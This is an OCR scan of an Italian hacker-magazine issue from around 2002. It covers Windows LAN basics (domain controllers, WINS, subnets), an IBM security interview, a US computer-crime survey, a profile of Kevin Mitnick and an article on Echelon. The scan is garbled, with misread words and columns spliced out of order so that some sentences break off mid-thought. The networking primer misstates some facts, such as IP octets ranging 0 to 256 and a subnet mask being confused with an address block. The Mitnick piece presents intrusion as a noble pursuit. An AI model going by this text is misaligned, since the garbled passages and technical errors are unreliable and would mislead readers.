preservare l'integrità della rete stessa e 
a garantire il corretto funzionamento 
del sistema anche nel caso che uno tra 
gli utilizzatori faccia qualche casino. 

Per questo esistono differenti classifi¬ 
cazioni standard degli utenti: un nor¬ 
male utente, per esempio, avrà acces¬ 
so a determinate risorse; potrà usare 
determinati programmi e compiere de¬ 
terminate operazioni. 

Un amministratore, al contrario, 
avrà maggior poteri e sarà in grado di 
installare applicazioni, cancellare files 
o muovere database, nonché interveni¬ 
re sulle "leggi" che governano gli uten¬ 
ti normali. Le varie tipologie di utenza 
della LAN possono essere le più svaria¬ 
te: a volte si rende necessario delegare 
a un gruppo di utenti determinati pote¬ 
ri, e ad un altro gruppo differenti. Per 
questo è altresì importante il concetto 
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di gruppo di utenti: un raggruppamen¬ 
to di utenti a cui assegnare regole - più 
propriamente politiche o policies - in 
modo generale. 

_ 

» Il Client questa 
sconosciuta 


In una rete, naturalmente, le mac¬ 
chine sono identificate da un indirizzo 
IR Essendo parecchio difficile, per noi 
comuni esseri mortali, ricordare a me¬ 
moria una serie di 4 numeri variabili in 
un intervallo da 0 a 256, ecco un ser¬ 
vizio di risoluzione dei nomi: WINS, ov¬ 
vero Windows Internet Nome Service. 
In una rete locale vi è solitamente una 
macchina che svolge questo compito 
(può sempre essere il PDC, in reti di 
piccole dimensioni): essa contiene una 
database "nome macchina - IP corri¬ 
spondente - servizi svolti" che di fatto 
fornisce una mappa di tutte le risorse 
disponibili sulla LAN. 

» Made in UJinduius 
2000 
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In una LAN 
è necessario 
definire 
quella che 
viene 
chiamata "IP 
subnet mask", 
ovvero una 
classe di IP che accomuni 
tutte le postazioni di 
lavoro: in reti Windows è 
classica la 192.168.x.x (per 
reti di ampie dimensioni), o 
la 192.168.159. x (per reti di 
minore portata). Si attua 
questa "mascheratura" degli 
indirizzi, ad esempio, per 



Data una velocissima occhiata a 
utenti&co, passiamo ai 
computer: oltre ai soliti 
client avremo, tipicamen¬ 
te, altre macchine atte a 
identificare gli utenti: 
computer, cioè, in pos¬ 
sesso del database con¬ 
tenente tutti gli utenti al 
quale il computer stesso 
fa riferimento quando i 
client gli richiedono l'au¬ 
tenticazione. 

Oltre a tale funzione, questa mac¬ 
china, chiamata PDC (acronimo per 
Primary Domain Controller) svol¬ 
ge anche altri importanti compiti: essa 
ospita infatti anche i database relativi 
a gruppi di utenti e acl, e nella stra¬ 
grande maggioranza dei casi svolge 
anche il compito di master browser; 
fornisce cioè la lista di tutte le risorse 
disponibili, al momento della chiama¬ 
ta, sulla LAN. 

Altro dettaglio da tenere a mente: il 
PDC può anche avere funzione di Net- 
Logon Server; fornire cioè ai client tutti 
gli script e procedure di avvio che ven¬ 
gono lanciati ogniqualvolta un client 
effettua un logon sulla rete. 

Il PDC viene spesso affiancato (spe¬ 
cie in reti leggermente più corpose che 
quelle costituita da tre o quattro mac¬ 
chine) da un Backup Domain Control¬ 
ler: una macchina che contiene tutte le 
informazioni stipate nel PDC e che 
quindi, in caso di qualsiasi problema a 
quest'ultimo, può prenderne il posto e 
permettere alla LAN di continuare ad 
operare correttamente. 


E' bene tener presente che nelle re¬ 
ti basate su Windows 2000 molte di 
queste "regole" sono mu¬ 
tate: si è persa la distin¬ 
zione tra PDC e BDC, in 
quanto in una rete pos¬ 
sono essere presenti più 
PDC che lavorano con¬ 
temporaneamente, e il 
servizio WINS è stato so¬ 
stituito da un normale 
DNS (Domain Name Ser¬ 
vice, utilizzato comune¬ 
mente in Internet). 

Tutte queste migliorie, però, non ga¬ 
rantiscono la compatibilità completa in 
una rete gestita da macchine Windows 
NT 4 insieme ad altre Windows 2000, 
e in alcuni casi (anche se Microsoft, uf¬ 
ficialmente, lo sconsiglia) è necessario 
ad esempio tenere comunque un server 
WINS per garantire il corretto funziona¬ 
mento della LAN mediante macchine 
NT 4. 

Quanto detto rappresenta solo una 
semplice infarinatura di alcuni ele¬ 
menti essenziali di una rete basata su 
Windows: esistono molti diversi servizi 
che è possibile implementare in una 
LAN (non tocchiamo nemmeno l'argo¬ 
mento Adive Directory), e infatti la do¬ 
cumentazione sulla infrastruttura di re¬ 
te in Windows è davvero mastodonti¬ 
ca. 

Lasciamo stare dunque WINS, PDC 
e compagnia e diamo un'occhiata a 
come le varie postazioni vengono 
identificate tra loro: abbiamo già ac¬ 
cennato al fatto che, comunque, ven¬ 
gono utilizzati indirizzi IP come vedia¬ 
mo nella sezione a fianco. È1 



suddividere due differenti 
reti : ad un piano di un 
palazzo che ospita gli uffici 
di una azienda, per esempio, 
si userà 192.168.1.X, e ad 
ogni singolo client verranno 
assegnati ip quali 
192.168.1.1, 192.168.1.2, 
192.168.1.3, e così via. 
Al piano superiore dello 
stesso palazzo ci potrebbe 
essere un'altra rete che non 



è in diretta comunicazione 
con la precedente e che avrà 
una subnet mask del tipo 
192.168.2.x. 
Quando le postazioni di una 
di queste reti accedono ad 
internet non lo fanno 
mediante il proprio ip locale 
ma sfruttando un'altra 
macchina che funzionerà da 


gateway, fornendo a loro, 
accesso al web, ma con un IP 
di propria classe che sarà 
quello utilizzato da TUTTE le 
macchine della sottorete per 
uscire su internet. 
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IBM:ANALISI SULLA SICUREZZA DELLE RETI INFORMATICHE 



L'ultima 

campagna 

stampa 

IBM 

dedicata 

alla 

sicurezza 


“Sicuramente” 


Le reti italiane sono 
sicure... più o meno come 
una Panda lanciata 
a 18D all’ora 

in autostrada. Ce lo riuela 
IBM, in una internista 
ricca di spunti 


IBM 


interessanti... PADRONI DEL PROPRIO BUSINESS 





Hacker Journal 
ha deciso di saltare 
la barricata 
e di recarsi 
nella "tana 
del nemico" come 
simpaticamente 
possiamo definire 
ia sede di IBM Italia. 
Lo scopo è semplice: 
cercare di capire lo 
stato della sicurezza 
informatica in Italia. 

Il nostro interlocutore 
è Mariangela 
Fagnani, Security 
& Privacy Practice 
Leader di IBM Global 
Service. E' lei che 
ci guida alla scoperta 
di un mondo, quello 
della sicurezza, 
che riserva non 


cedure, strati aziendali e soluzioni tec¬ 
nologiche si riesce a determinare con 
buona attendibilità il livello di sicurezza 
di un sistema. 

->Una fotografia della 
situazione italiana: i 
server e le reti sono ge¬ 
neralmente vulnerabili! 
oppure abbiamo un buon 
livello di sicurezza? 

(Un attimo di riflessione). La sicurezza in 
Italia sta sicuramente migliorando, au¬ 
mentano gli investimenti delle aziende e 
la sensibilità verso questo tipo di pro¬ 
blema. 

Tuttavia è innegabile che spesso molte 
strutture presentano un preoccupante li¬ 
vello di vulnerabilità riconducibile non 
tanto alla struttura in sé, che viene spes¬ 
so creata con sufficiente attenzione a 
questo tipo di problematiche, ma dallo 
scarso mantenimento e dalla mancan¬ 
za di aggiornamento del sistema che 


poche sorprese... I§l 


viene il più delle volte abbandonato a 


se stesso. E' un problema di uno skill 
non adeguato. Per mantenere l'efficien¬ 
za di una rete informatica anche solo di 
una LAN bisogna aggiornarla e moni- 
torarla in continuazione. 

-»Sono frequenti i casi 
di hacking o attacchi 
vari a reti aziendali 
e quanti danni causano? 
E' possibile darne una 
quantificazione in ter¬ 
mini monetari? 

Difficile ricostruire uno spaccato della si¬ 
tuazione italiana perché non esistono 
dati sufficienti a creare un grafico attendi¬ 
bile. Questo perché molte società vittime 
di attacchi non li denunciano e quindi i 
dati sono frammentari e rappresentano 
uno spaccato davvero poco attendibile 
della situazione italiana. 

E' altrettanto vero che comunque gli at¬ 
tacchi a sistemi informatici ci sono, anche 
a quelli di grandi aziende. 

L'anno scorso, ad esempio, alcune grosse 
società sono state letteralmente bloccate 
per attacchi di varia natura che non han¬ 
no di fatto provocato grandi perdite di da¬ 
ti, ma che hanno causato un blocco dei 
server per due o tre giorni. 

Fare una stima monetaria dei danni non è 
semplice, ma per un'azienda che fattura 
centinaia di miliardi rimanere bloccata per 
tre giorni rappresenta un danno economi¬ 
co rilevante. 
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-»Che posizione ha IBM 
rispetto a Linux e ai 
sistemi Open Sourcef 
Linux è una delle piattaforme più sicure 
in assoluto e deve questa sua sicurezza 
proprio al fatto di essere un sistema 
aperto, migliorato e sviluppato da una 
moltitudine di utenti. 

Sono sicura che Linux è destinato a dif¬ 
fondersi come piattaforma informatica 
per le aziende. 

Al momento forse è ancora frenato da 
una serie di pregiudizi, come la diffi¬ 
denza da parte di molte aziende circa 
l'effettiva possibilità di trovare, dopo 
aver installato il sistema, un'assistenza 
adeguata. 

-»Che cosa ne pensate dei 
nuovi sistemi operativi 
proprietari Windows -1ikef 
(Risatina). Cos'è una domanda trabocchetto? 

-»Forse . • .possiamo 
anche soprassedere . • . 
(Altra risatina). No parliamone pure del 
resto non è un mistero. E' vero che mol¬ 
to software di Microsoft non presenta 
una grande attenzione in termini di sicu¬ 
rezza... 

■^Unicode non è un ca¬ 
so isolato • . • 

Direi di no. Il problema è dato anche 
da un altro elemento innegabile: Mi¬ 
crosoft ha una grande diffusione co¬ 
sì come i suoi prodotti. 

Quindi un software Microsoft viene 
testato da una quantità molto gran¬ 
de di utenti, questo aumenta sensi¬ 
bilmente le possibilità che vengano 
scoperti e segnalati bug o difetti. 

Il fatto che un software non riveli 
nessuna falla, forse dipende anche 
dalla sua scarsa diffusione. 

Pochi lo comprano, pochi lo usano, 
ci sono meno probabilità di rilevare 
difetti strutturali. 

-»£3uali sono le soluzioni 
proposte da IBH in te¬ 
ma di sicurezza e a chi 
sono rivolte! solo alle 
aziende o anche ai pri¬ 
vati? 

Prevalentemente alle aziende e qui il 
parco di soluzioni è davvero ampio, si 
va dalla consulenza pura all'analisi di 
sistemi informatici aziendali, da cui de¬ 
riva poi il suggerimento di soluzioni tec¬ 
nologiche adeguate. 


-»Molti vorrebbero sapere 
come si fa ad arrivare ad 
avere un “posto al sole" 
nel settore sicurezza di 
IBUi quali percorsi! qua¬ 
li studi? 

Beh, la trafila è abbastanza normale. 
In genere occorre una solida prepara¬ 
zione a livello tecnico e buona cono¬ 
scenza delle reti tcp/ip. Poi un percor¬ 
so scolastico di tipo universitario rap¬ 
presenta un requisito essenziale. IBM 
attinge proprio dall'Università per re¬ 
clutare giovani che poi vengono fatti 
crescere all'interno della struttura 
aziendale. Quello della formazione è 
uno dei canali più seguiti da IBM, co¬ 
munque non disdegniamo di acquisire 
figure professionali già formate, con 
uno skill di tutto rispetto. Questo spes¬ 
so porta all'azienda un valore aggiun¬ 
to e nuove conoscenze. 



-^Abbiamo già definito la 
figura dell'esperto di 
sicurezza. E quella 
dell'hacker? Proviamo a 
tracciarne un profilo- 
E' un curioso. Uno che per passione, 
per voglia di conoscere, di acquisire 
informazioni, entra nei sistemi infor¬ 
matici, violandone le difese e senza 
lasciare molte tracce dietro di sé. 
Raramente fa dei danni veri, la sua 
motivazione principale è quella di ac¬ 
quisire informazioni non di distrugge¬ 
re i sistemi informatici. 

Certo si registrano attacchi distruttivi a 
reti e server ma questi non sono fatti 
dagli hacker singoli, ma da organiz¬ 
zazioni strutturate con base criminale 
che vogliono colpire dei bersagli con 
intenti distruttivi. 

Si parla di reti criminali vere e proprie. 
L'hacker, quello vero, probabilmente è 
ideologicamente in contrasto con que¬ 
sto tipo di ambientazione criminale. SI 


*...1 SISTEMI 
HANNO SPESSO UN 
ELEVATO LIVELLO 
DI 

VULNERABILITÀ.» 

> M. Fagnani, Sicurezza IBM 




"Computer crime and security 
survey 2002" 


^Hiil rapporto annuale messo a pun¬ 
to dal Csi (Computer security institute) di 
San Francisco e dalla squadra anti-cri- 
mini informatici dell'Fbi da cui si ricava 
uno spaccato piuttosto interessante della 
sicurezza delle società americane in 
chiave informatica. 

Dal rapporto del 2002 si evidenzia 
che la fonte di maggior pericolo per le 
aziende è rappresentata da Inter¬ 
net. Il campione di intervistati è di 3.500 
professionisti responsabili dei sistemi ITC 
o comunque a capo dell'organizzazione 
informatica di società americane me¬ 
dio/grandi. 

L'intervista ha rivelato che il 59 per 

cento degli attacchi informatici ar¬ 
riva dalla rete. 

Di questi, il 40 per cento è effettuato 
da cracker che cercano a vario titolo, a 
volte riuscendovi, di penetrare all'interno 
dei dati aziendali, sfruttando Internet 
come canale di comunicazione e le 
vulnerabilità di sistemi e software come 
porta d'ingresso. 

Ma non sono solo i pirati informatici 
a bucare i sistemi e appropriarsi di da¬ 
ti "sensibili". Sempre secondo l'indagine 
tra i soggetti che violano sistemi di si¬ 
curezza di vario genere sono presenti in 
maniera massiccia gli ex dipendenti 
licenziati (75% dei casi), società 
concorrenti statunitensi (38%) e in¬ 
ternazionali (26%). 

Richard Power, direttore del Compu¬ 
ter security institute di San Francisco, ha 
ammesso che le perdite medie dichia¬ 
rate dalle società campione per attac¬ 
chi di tipo informatico ammontano a 
circa 2 milioni di dollari all'anno. 

Una cifra assolutamente incredibile. 
Se poi si pensa che solo il 44 per cen¬ 
to degli intervistati ha voluto quantifica¬ 
re le perdite economiche subite si arri¬ 
va comunque a un dato parziale di 
455 milioni di dollari all'anno, una 
piccola fortuna... 
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MITI Si LEGGENDE 


lime uni il Kevin Mllnit:kn|fl br imlv Ire#: 

0 years, 9 monthv, 25 day*, 10 hourv, 51 minute*, 26 veconch 


IL PIU GRANDE HACKER DI TUTTI I TEMPI 


rete II unlo del Condor 



ANTE HACKER 


Se Mitnick è 1'hacker più 
famoso al mondo sicuramente 
non è stato il primo. In 
questo senso si segnala tale 
John Draper che intorno agli 
anni sessanta aveva trovato 
il modo di [telefonare gratis 
usando un fischietto 
contenuto nelle patatine 
"Captain Crunch". Questo 
emetteva un segnale acustico 
con una frequenza che, 
al momento della chiamata, 
paralizzava il centralino 
consentendo a Draper, 
diventato poi per tutti 
Captain Crunch, 
di telefonare gratis da un 
capo all'altro del mondo. 


Se volete avere 
un panorama davvero 
esaustivo di tutti 
gli articoli che riguardano 
Mitnick basta accedere 
all'indirizzo: 

http://hpgx.net/willday/mitn 
ick.html, spartano ma 

assolutamente imperdibile. 


SHIMOMURA 
SE LA GODE 

"L'amato" Mr. Shimomura 
nel frattempo ha incassato 


per il libro che ha scritto, 
"Sulle tracce di Kevin" 
(edizione Sperling & Kupfler) 


Detenuto da circa 4 anni 


Keuin Mitnick continua 


a lare parlare di sé. 

E’ stato il più geniale hacker 
del mondo, probabilmente 
lo è ancora, senz’altro è il più 
famoso. Per molti paladino 
di Internet libero, per altri, 
pochi, un pericoloso criminale 


M itnick per lungo tempo è stato 
una specie di Primula Rossa. Per 
incastrarlo sono sfati necessari 
due anni fitti di investigazioni da 
parte dell'FBI e mesi e mesi di 
monitoraggi continui da Minneapolis a 
Washington, fino a Denver e Colorado. 

Inizia la sua "carriera" mentre frequenta 
la Monroe High School di Los Angeles dove 
riesce ad accedere alla banca dati centrale 
del distretto scolastico; solo due anni dopo si 
migliora, eludendo i codici di accesso dei 
computer del dipartimento di Difesa Ameri¬ 
cana. In seguito a questa prodezza passa i 
successivi sei mesi al sole della California, o 


alle grandi banche dati delle società infor¬ 
matiche del paese, per riuscire a carpire tut¬ 
te quelle informazioni che dovrebbero esse¬ 
re, secondo Mitnick, patrimonio di tutti in 
nome di una visione utopica di Internet libe¬ 
ro. Informazioni che invece vengono tenute 
segrete e custodite gelosamente proprio dal¬ 
le società di software. Per Mitnick tutto ciò è 
intollerabile. 

La teoria che l'interesse di Mitnick per 
Bonnie 


non fosse determinato da un folle 
amore ma da motivi più opportunistici è av¬ 
valorata anche da un amico, il quale affer¬ 
ma senza ombra di incertezza: "Kevin non è 
stato mai particolarmente attratto dalle don¬ 
ne, credo che abbia per l'altro sesso lo stes¬ 
so interesse che nutre per un Silicon chip". 

Grazie all'accesso privilegiato alle reti te- 


rata" tenta il grande colpo: si inserisce nel 
computer della Digital Equipment Corpora¬ 
tion di Palo Alto e copia alcuni programmi 
per computer assolutamente top-secret. 

Il Condor è attratto dal VAX/VMS un si¬ 
stema operativo proprietario di Digital, pra¬ 
ticamente inattaccabile, esente da bug, l'u¬ 
nico nel suo genere. Mitnick vuole carpire i 
segreti della Digital, vuole scoprire i segreti 
del VAX/VMS. 

Anche in questo caso, come sempre, 
cambia il suo nome di accredito telefonico 
in James Bond e modifica gli ultimi tre nu- 


I n questo periodo conosce Bonnie Vitello, 
una donna di sei anni più vecchia, dalla 
folta chioma castana e dal fisico esile: un 
personaggio un po' anonimo, che sarebbe 
diventato sua moglie! Bonnie lavora come 
manager alla GTE, la compagnia telefonica 
di Los Angeles, ed è proprio questo ruolo 
che colpisce la fantasia di Mitnick. Infatti, 
realizza subito che Bonnie potrebbe vera¬ 
mente essere fondamentale per accedere 


20 | www.hackerjaurnal.it 




































FREE KEVIN 


meri di riferimento digitati in 007: una vera 
finezza! 

Naturalmente, questo colpo non passa 
inosservato e l'FBI si lancia sulle sue tracce. 
Mitnick viene "beccato" in una sera di di¬ 
cembre dagli agenti della FBI mentre si sta 
recando nell'ufficio di Bonnie per la solita 
scorribanda informatica. 

Viene accusato di danni ai sistemi infor¬ 
matici di società per un ammontare di cin¬ 
que milioni di dollari! 

Proprio a seguito di questa sentenza fini¬ 
sce per trascorrere i successivi 22 mesi a 
Lompoc, una prigione di alta sicurezza nel 
sud della California. E, in seguito, nel Beit 
T'SIuvah Center, per persone con gravi pro¬ 
blemi mentali. 

Dopo questo periodo di "cura" Mitnick ri¬ 
prende "il lavoro". Utilizzando Social Engi¬ 
neering, una tecnica di hacking più sofisti¬ 
cata, torna alla carica per cercare di carpi¬ 
re i segreti delle grandi società informati¬ 
che. La sua è voglia di conoscenza, tutte le 
informazioni che acquisisce non vengono 
utilizzate per scopi criminali, né vengo¬ 
no rivendute per procurarsi vantaggi eco¬ 
nomici. No, il Condor si batte solo per il di¬ 
ritto alla conoscenza, viola le banche dati 
solo per apprendere, ma purtroppo per lui 
questa sua aspirazione, per quanto alimen¬ 
tata da motivazioni nobili, è già di per sé un 
reato per il governo americano. 

Quando l'attenzione nei suoi confronti 
comincia a rifarsi insistente, Mitnick scom¬ 
pare nuovamente dalla circolazione facen¬ 
do perdere le sue tracce. 

I» La sfida 

N el dicembre del 1994, proprio il gior¬ 
no di Natale, i destini di Mitnick e Shi- 
momura si incrociano: comincia così la 
grande caccia... Infatti, come riporta il New 
York Times, Shimomura si sta recando a San 
Francisco quando Mitnick "viola" il sistema di 
sicurezza del suo computer, nella sua casa di 
San Diego. Il messaggio che lascia sullo 
schermo del computer di Shimomura è de¬ 
gno di un film di azione: "Find me. I am 
on thè net", "Trovami, sono sulla rete". Ma 
è proprio in questo frangente che Mitnick 
commette il suo primo grossolano errore. In¬ 
fatti, nel momento in cui Mitnick viola il siste¬ 
ma di sicurezza del computer di Shimomura 


trascura un elemento fondamentale. Il PC 
dell'esperto di sicurezza è programmato per 
trasmettere una serie di copie di file di routine 
in un'altra parte della rete informatica in sua 
assenza, e precisamente al San Diego Super- 
computer Center. L'intervento di Mitnick quin¬ 
di fa subito scattare l'allarme proprio alla SC 
di San Diego e Shimomura viene richiamato 
urgentemente dalla sua vacanza sciistica per 
cercare di ricostruire l'attacco al suo PC. 

Naturalmente di Mitnick non rimangono 
che poche tracce, per l'attacco ha usato una 
nuova tecnica denominata IP-spoofing difficil¬ 
mente intercettabile, ma Shimomura ha una 
prova dell'esistenza di un super hacker. 

Poco dopo il manager della Netcom -altra 
società nel mirino di Mitnick-, Robert Hood, 
ha finalmente una traccia dell'hacker. Infatti, 
come comunicherà in seguito all'agente del- 
l'FBI Levord Bums, individua una serie di in¬ 
trusioni in diversi "Points of Presence" (POPs), 
della Netcom attraverso accessi pubblici via 
telematica situati in diverse città degli Stati 
Uniti. In particolare dal POP (919)558XXXX 
situato proprio a Relaigh in North Carolina e 
utilizzato per una serie di intrusioni a catena. 
E' proprio questo l'indizio che porterà gli 
agenti dell'FBI, guidati da Shimomura, da¬ 
vanti alla porta dell'appartamento di Mitnick. 

Perché il più grande hacker di tutti i tempi 
sia stato arrestato non è semplice da spiega¬ 
re. La risposta si trova nella directory di Inter¬ 
net <thantos@ruinc.mind.org >, la forni¬ 
sce un altro hacker super ricercato: Legion. 
"Mitinick è rimasto prigioniero non dell'FBI, 
ma della sua stessa ossessione a violare si¬ 
stemi di sicurezza per carpire informazioni... 
non è riuscito a fermarsi, ha volutamente 
spinto la propria opera di saccheggio oltre 
ogni limite consentito. Se solo avesse voluto 
nessuno sarebbe mai riuscito a mettergli un 
paio di 'braccialetti' ai polsi..." 

Invece le cose sono andate diversamente e 
così quella sera del 15 febbraio Mitnick è fi¬ 
nito in carcere, dove si trova tutt'ora. Il popo¬ 
lo della rete gli ha dedicato nel frattempo un 
sontuoso sito: http://www.kevinmitnick.com. 

In Home page al posto del solito contatore 
c'è un countdown che segna, secondo dopo 
secondo, quanto tempo manca alla scarcera¬ 
zione di Mitnick. Nel momento in cui scrivia¬ 
mo questo articolo mancano ancora nove 
mesi, 28 giorni, 9 ore, due minuti, 18 secon¬ 
di,anzi diciassette, anzi sedici... 

Dopodiché il Condor tornerà a volare... SI 


IL SITO 
UFFICIALE 

Tutto quello che . : vy' 
riguarda Kevin ^ _ 
Mitnick si trova ii 

nel suo sito ufficiale 
all'indirizzo 
://www. kevinmitnick.com. Il 
sito è stato creato dai suoi 
sostenitori più accaniti ed è un 
vero e proprio luogo di culto. 


IL GIOCO 
DEL 

FUGGITIVO 


Se volete ripetere 
l'inseguimento di 
Shimomura a Mitnick 




di ruolo, potete farlo sul 

sito : 

http://www.well.com/user/jli 
ttman/game/. Propedeutico 
per capire meglio la vicenda 
e sviscerare i profili 
psicologici di quelli che 
vengono considerati i 
protagonisti della storia, 
compreso |il "cacciatore di 
taglie" Shimomura, alter ego 
di Mitnick. 


TUTTI LINK 
DI MITNICK 


File MP3 di canzoni 
intitolate "Free 
Kevin Mitnick”, la 




sequenza 

dell'attacco al PC di 

Shimomura, tutti questi link 
trovano spazio all'indirizzo: 
"http:/ /www. albany.net/~dsiss 
man/mitnick.html. 
Purtroppo molti non sono 
più attivi ma il materiale 
a disposizione è comunque 
notevole e non mancherà 
di suscitare gli 
apprezzamenti di tutti i fans 
dell'hacker. 
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Sorridi 


Se auete sempre pensato 
che il uostro portinaio 
fosse la più formidabile 
risorsa per carpire 
informazioni, sappiate 
che non è così, esiste 

un sistema _^—- 

^diinterfeffazione dati 
che è molto più efficiente 
di 1.000 portinai messi 
insieme, forse anche 
di 2.000... 


Esiste un Grande Fra¬ 
tello? E se sì, è più simile a 
quello ipotizzato da Geor¬ 
ge Orwell nel suo libro 
"1984", oppure assomi- 

I _glia in modo inquietante a 

quello di Taricone e soci? La domanda 
ha una sua risposta ben precisa: il 
"Grande Fratello" capace di sorvegliare 
tutto e tutti esiste, si chiama Echelon e ar¬ 
riva in ogni casa spiando tra le pieghe 
della nostra vita privata. 


» Le prime tracce 
negli Rnni ‘70 

Dell'esistenza di un sistema di intercet¬ 
tazione globale si è sempre parlato e te¬ 
muto, tuttavia il primo a portare delle pro¬ 
ve e ha rivelarne l'esistenza è stato un 
giornalista, Duncan Campbell, che ne 
parlò per la prima volta in un articolo in¬ 
titolato "Big Brother is listening" pubblicato 
dal New Statesman di Londra nel 1981. 
Successivamente a prove si aggiunsero al¬ 
tre prove e la struttura di Echelon divenne, 


passo dopo passo, sempre più definita. In 
particolare prove concrete della sua esi¬ 
stenza si trovano su un libro pubblicato 
nel 1996: "Secret Power", in cui l'autore 
Nicky Hager, cita numerose testimonianze 
raccolte intervistando circa 50 persone co¬ 
involte nei servizi segreti, che lavoravano 
o avevano lavorato per la più grande 
agenzia di intelligence della Nuova Ze¬ 
landa, la Government Communica¬ 
tions Security Bureau (GCSB). E pro¬ 
prio la Nuova Zelanda rappresenta uno 
dei Paesi che hanno contribuito in modo 
preciso alla nascita di Echelon. Alla base 
c'è un patto sancito nel 1948 e denomi¬ 
nato UKUSA Strategy Agreement, cui ade¬ 
rirono, la National Security Agency Statu¬ 
nitense, il Government Communications 
Headquarters (GCHQ) Britannico, la 
Communications Security Establishment 
(CSE) Canadese, ed il Defense Signals Di- 
rectorate (DSD) Australiano. In base agli 
accordi, gli Stati membri avrebbero co¬ 
operato per sviluppare un sistema di spio¬ 
naggio globale progettato dall'NSA il cui 
nome in codice sarebbe stato inizialmente 
"Progetto P-415", poi cambiato in Echelon. 


ECHELON 


-i) La parola deriva dal francese 
antico eschelon, a sua volta dal tardo 
latino scala, da cui scalino, ma anche 
reticolato a gradinata, scaglione, e 
infine, "gruppo di unità singole non 
allineate". Che sarebbero, secondo fonti 
non ufficiali, le intelligence di Stati Uniti, 
Gran Bretagna, Canada, Australia e 
Nuova Zelanda. 


Echelon è un sistema estremamente 
complesso per intercettare ogni forma di 
comunicazione: dalla telefonata, al fax, fi¬ 
no all'e-mail. Nulla sfugge. 

Echelon è globale in grado di control¬ 
lare le comunicazioni tra persone che si 
scambiano informazioni tra paesi diversi 
ma anche di controllare le comunicazioni 
di persone nello stesso paese, in pratica 
ovunque nel mondo. Benché sia nato e si 
sia sviluppato in un periodo di "guerra 
fredda" non ha primariamente scopi bel¬ 
lici, forse li ha avuti in una prima fase em¬ 
brionale del suo sviluppo, ma oggi serve 
soprattutto ai paesi che ne fanno parte 
per esercitare un controllo globale su tut¬ 
to quello che avviene e per filtrare, inter¬ 
cettare e catalogare milioni di informazio¬ 
ni riservate. 
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Echelon non è stato progettato per 
spiare una particolare e-mail di un indivi¬ 
duo o una utenza fax specifica. 

Al contrario, il sistema lavora indiscri¬ 
minatamente intercettando grandissime 
quantità di comunicazioni, e attraverso 
l'uso di computer è in grado di filtrare le 
informazioni e di estrarre solo quelle rite¬ 
nute interessanti: frammenti di dati raccol¬ 
ti tra milioni di informazioni con una pre¬ 
cisione quasi chirurgica. Echelon è sostan¬ 
zialmente organizzato come una catena 
di strutture di intercettazione in giro per il 
pianeta per monitorare la rete di teleco¬ 
municazioni globale . 

Alcune strutture controllano i satelliti di 
comunicazione , altre i network a terra ed 
altre le comunicazioni radio. Echelon le¬ 
ga insieme tutte queste strutture renden¬ 
do così possibile agli Stati Uniti ed ai suoi 
alleati di intercettare una grande quantità 
delle comunicazioni in atto nel pianeta. I 
computer posti in ogni stazione del siste¬ 
ma ECHELON cercano tra i milioni di 
messaggi intercettati quelli conte¬ 
nenti le keywords, le parole chiave , 
precedentemente inserite. Le keywords, 
includono elementi che possono avere 
una qualsiasi rilevanza: nomi, località, 
soggetti, ma anche parole apparente¬ 
mente "pericolose" o strane che possano 
fare pensare ad un sistema di messaggi- 
stica in codice. 

Ogni parola di ogni messaggio inter¬ 
cettato viene scansionata automatica- 
mente da qualsiasi fonte provenga. Le 
migliaia di messaggi simultanei vengono 
letti in "tempo reale" come giungono alle 
stazioni, ora dopo ora, giorno dopo gior¬ 
no e i computer riescono a trovare "l'ago" 
scelto dagli intelligence nel "pagliaio" del¬ 
le telecomunicazioni . I computer nelle 
stazioni in giro per il mondo sono chia¬ 
mati, all'interno del network, i "Dizionari". 

»Un’idea uecchia 
ma nuoua... 


L'esistenza di computer come i "Dizio¬ 
nari" non è una novità, erano già usati 
all'epoca della guerra fredda, ma rappre¬ 
sentavano unità singole e autonome non 
comunicanti tra loro. La novità di Echelon 
è stata quella di creare un Network per¬ 
fettamente integrato dove i singoli compu¬ 
ter dialogano con tutti ali altri e sono in 
grado, non solo di scambiarsi informazio¬ 
ni, ma anche di utilizzare la lista di key¬ 
words elaborata da ogni singolo Paese 


membro. Così, di fatto, le stazioni degli 
alleati minori della alleanza funzionano 
per la NSA come se fossero proprio basi 
fuori dal territorio USA. Ognuno delle cin¬ 
que stazioni dove sono i "Dizionari" pos¬ 
siede un nome in codice che la distingue 
dalle altre della rete. Questi nomi in codi¬ 
ce sono registrati all'inizio di ogni mes¬ 
saggio intercettato prima che sia distribui¬ 
to attraverso il network di Echelon , e per¬ 
mettono così all'analizzatore di individua¬ 
re subito quale stazione ha effettuato l'in¬ 
tercettazione. Un ulteriore componente 
del sistema Echelon intercetta una serie di 
comunicazioni satellitari non veicolate dal 
sistema "intelsat". Vi è poi un insieme di 
strutture per monitorare le comunicazioni 
via terra: rappresentano l'elemento finale 
del sistema. Sono ovviamente anche un 
bersaglio per intercettazioni su larga sca¬ 
la di classiche comunicazioni nazionali tra 
le persone, e naturalmente neanche que¬ 
sto sfugge ad Echelon che approfitta di 
questa larga via di trasmissione dati per 
effettuare controlli contemporanei su un 
flusso di informazioni assolutamente gi¬ 
gantesco. Le informazioni più scontate sul 
sistema Echelon si trovano sul sito della 
NASA (www.nsa.gouv), quelle più im¬ 
barazzanti ve le diamo noi. Echelon è da 
una parte un sistema di sorveglianza, di¬ 
ciamo un metodo preventivo per scongiu¬ 
rare forse eventi criminosi, e fin qui nulla 
di male. Ma se usato in modo scorretto 
(ammesso che cacciare il naso nelle no¬ 
stre faccende sia un comportamento legit¬ 
timo), può essere uno strumento capace 
di conferire vantaggi ingiustificati ai pae¬ 


si che ne fanno parte, soprattutto gli Stati 
Uniti. Con Echelon si possono condizio¬ 
nare le trattative commerciali. Il Sunday 
Times qualche tempo fa ha riportato che 
la società di intermediazione francese 
Thompson CSF ha perduto un contratto 
da 1,4 milioni di dollari per la fornitura 
di un sistema radar al Brasile. Le trattative 
ben avviate sono state intercettate, attra¬ 
verso Echelon, e la società americana 
Raytheon ha potuto conoscere tutti gli ele¬ 
menti della trattativa e ne ha approfittato 
per "scippare", proponendo presumibil¬ 
mente condizioni lievemente migliori, la 
commessa alla società d'Oltralpe. 

E' evidente che questo è un gioco spor¬ 
co: un po' come partecipare ad un'offerta 
a buste chiuse per ottenere un appalto, co¬ 
noscendo già in anticipo le offerte dei con¬ 
correnti. Ma è solo uno dei tanti casi. Co¬ 
me si può sfuggire ad Echelon? Non serve 
criptare i documenti, nel senso che il siste¬ 
ma è in grado di individuare quelli criptati 
e separarli dalla marea di comunicazione 
come elementi sensibili. 

Certo ci mette un po' di più ad impar¬ 
tire tutte le istruzioni, perde alcuni minuti: 
probabilmente se qualche milione di inter¬ 
